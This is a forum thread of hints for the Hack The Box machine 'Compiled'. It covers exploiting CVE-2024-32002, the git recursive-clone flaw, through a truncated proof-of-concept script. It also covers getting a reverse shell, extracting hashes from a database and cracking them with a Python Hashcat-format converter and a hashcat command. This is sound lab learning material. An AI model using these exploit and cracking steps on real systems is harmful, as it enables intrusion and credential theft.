Compiled Discussion [HTB] [HINTS]

killab33z · September 2, 2024, 3:08am

Let’s discuss Compiled

Hex · September 2, 2024, 8:59am

I am just starting to solve it. Give me some time.

Hex · September 2, 2024, 11:09am

For initial foothold, I’ll try to exploit CVE-2024-32002. If the server clones recursively, we can get a RCE. Now looking for a PoC.

Hex · September 2, 2024, 11:32am

I am using this but can’t get a shell.

github.com

safebuffer/CVE-2024-32002/blob/main/poc.sh

#!/bin/bash

# Define repository paths
HULK_REPO="git@github.com:safebuffer/hulk.git"
pullme_REPO="git@github.com:safebuffer/submod.git"

# Final Exploit Repo
SMASH_REPO="git@github.com:safebuffer/smash.git"

# Function to clone and set up the hook repository
setup_HULK_REPO() {
	# Remove existing directories
	rm -rf hulk*

	git clone "$HULK_REPO" hulk

	# Navigate to the hook repository
	cd hulk/ || exit

	# Create necessary directories and set up the post-checkout hook

This file has been truncated. show original

Hex · September 2, 2024, 1:05pm

Okay, I figured it out. You just need to paste a domain name into the compile site, not an IP. I got the reverse shell and was enumerating the machine when I found a .db file. I’m extracting hashes from it.

Use this script to convert to Hashcat format:

import base64

salt = bytes.fromhex('SALT_HEX')
hash = bytes.fromhex('PWD_HEX')
rounds = 50000

base64_hash = base64.b64encode(hash)
base64_salt = base64.b64encode(salt)

print(f"sha256:{rounds}:{base64_salt.decode()}:{base64_hash.decode()}")

Then run:

hashcat -m 10900 -a 0 -o cracked.txt hash.txt rockyou.txt

Hex · September 2, 2024, 2:23pm

Privilege escalation to root is a death.

Hex · September 2, 2024, 2:34pm

Reset the machine if the root exploit does not work, even after you have modified and rebuilt it.

killab33z · September 10, 2024, 1:55am

Want to add here that Evil-WinRM will not work on the last steps of this box.